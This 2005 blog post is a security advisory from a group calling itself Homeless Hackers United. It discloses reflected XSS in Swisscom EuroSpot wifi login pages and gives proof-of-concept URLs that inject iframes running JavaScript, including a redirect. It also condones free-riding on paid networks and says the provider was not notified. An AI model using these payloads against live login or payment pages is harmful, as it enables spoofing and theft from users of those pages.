{"id":319,"date":"2005-10-28T22:55:50","date_gmt":"2005-10-28T15:55:50","guid":{"rendered":""},"modified":"2005-10-28T22:55:50","modified_gmt":"2005-10-28T15:55:50","slug":"hhu-1","status":"publish","type":"post","link":"https:\/\/deepquest.code511.com\/blog\/2005\/10\/hhu-1\/","title":{"rendered":"HHU #1"},"content":{"rendered":"<p>&#8220;It&#8217;s secure, it&#8217;s reliable, it&#8217;s Swiss&#8221;<!--more--><\/p>\n<p>&#8220;It&#8217;s secure, it&#8217;s reliable, it&#8217;s Swiss&#8221;<\/p>\n<p>HHU<br \/>\n&#8212;<br \/>\nHomeless Hackers United is a small group of homeless hackers from Europe and<br \/>\nNorth America. We can&#8217;t afford paying for Internet access or hotel rooms.<br \/>\nOur only crime is to have a laptop and wireless card, and few knowledge.<br \/>\nHomeless state give us the freedom to access and use various open systems,<br \/>\naccessible from public places.<\/p>\n<p>Who<br \/>\n&#8212;<br \/>\nSwisscom EuroSpot is a wireless service offered in airports, hotels and<br \/>\nother public places. Customers buy certain amount of time online and get access<br \/>\nto the wireless network. The login page is of course open in order to join and<br \/>\nsubscribe to the service.<br \/>\nHHU has been able to access, and validate around several hotels and public<br \/>\nplaces.<\/p>\n<p>Severity<br \/>\n&#8212;&#8212;&#8211;<br \/>\nMedium<\/p>\n<p>Vulnerability<br \/>\n&#8212;&#8212;&#8212;&#8212;-<br \/>\nXSS, URL evasion<\/p>\n<p>Details<br \/>\n&#8212;&#8212;-<br \/>\nSwisscom access point seems to use radius servers to provide internet access to<br \/>\ntheir customers. We also noticed issues on the radius authentification process<br \/>\nthat may be published later. After joining the network you will have either to<br \/>\nbuy access time or login. The following has been tested in UK, Germany, France<br \/>\nand Norway.<\/p>\n<p>[url=http:\/\/login**.swisscom-eurospot.com\/error.php?error=nasunknown_ui&#038;UI=XSS]http:\/\/login**.swisscom-eurospot.com\/error.php?error=nasunknown_ui&#038;UI=XSS[\/url]<br \/>\n[url=http:\/\/login**.swisscom-eurospot.com\/login.php?LANG=de&#038;UserID=0&#038;RadiusReply=XSS]http:\/\/login**.swisscom-eurospot.com\/login.php?LANG=de&#038;UserID=0&#038;RadiusReply=XSS[\/url]<\/p>\n<p>Proof of Concept<br \/>\n&#8212;&#8212;&#8212;&#8212;&#8212;-<br \/>\n[url=http:\/\/login02.swisscom-eurospot.com\/error.php?error=nasunknown_ui&#038;UI=Please%20fix%20this%20site]http:\/\/login02.swisscom-eurospot.com\/error.php?error=nasunknown_ui&#038;UI=Please%20fix%20this%20site[\/url]<br \/>\n[url=http:\/\/login02.swisscom-eurospot.com\/error.php?error=nasunknown_ui&#038;UI=%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C\/IFRAME%3E]http:\/\/login02.swisscom-eurospot.com\/error.php?error=nasunknown_ui&#038;UI=%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C\/IFRAME%3E[\/url]<br \/>\n[url=http:\/\/login02.swisscom-eurospot.com\/error.php?error=nasunknown_ui&#038;UI=%3CIFRAME%20SRC=javascript:window.parent.location.replace(%2527http:\/\/google.com%2527)%3E%3C\/IFRAME%3E]http:\/\/login02.swisscom-eurospot.com\/error.php?error=nasunknown_ui&#038;UI=%3CIFRAME%20SRC=javascript:window.parent.location.replace(%2527http:\/\/google.com%2527)%3E%3C\/IFRAME%3E[\/url]<\/p>\n<p>Impacts<br \/>\n&#8212;&#8212;-<br \/>\nChange, spoof and fool end-users on login page or paiement page. With a bit on<br \/>\nimagination it can be worst.<\/p>\n<p>Timeline<br \/>\n&#8212;&#8212;&#8211;<br \/>\nDiscovered: august  14th 2005<br \/>\nDisclosure: october 28th 2005<br \/>\nService Provider: no<\/p>\n<p>HHU Policy<br \/>\n&#8212;&#8212;&#8212;-<br \/>\nHHU can&#8217;t even afford food, and we&#8217;re are not paid to debug softwares or systems<br \/>\nfor free.<br \/>\nWe discover, then publish what we find. Will route tcp\/ip packets for food!<br \/>\n&#8220;Fool me once, shame on ? shame on you. Fool me ? you can&#8217;t get fooled again.&#8221;<br \/>\n? George W. Bush<\/p>\n<p>HHU Credits<br \/>\n&#8212;&#8212;&#8212;&#8211;<br \/>\ndeepquest for discovering and POC, Mescalito for more POC.<br \/>\noriginal post [url=http:\/\/deepquest.code511.com\/blog\/more.php?id=319_0_1_0_M]http:\/\/deepquest.code511.com\/blog\/more.php?id=319_0_1_0_M[\/url]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Swisscom EuroSpot is a wireless service vulnerability<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[9],"tags":[],"class_list":["post-319","post","type-post","status-publish","format-standard","hentry","category-hhu"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p4bBYZ-59","_links":{"self":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/319","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/comments?post=319"}],"version-history":[{"count":0,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/319\/revisions"}],"wp:attachment":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/media?parent=319"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/categories?post=319"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/tags?post=319"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}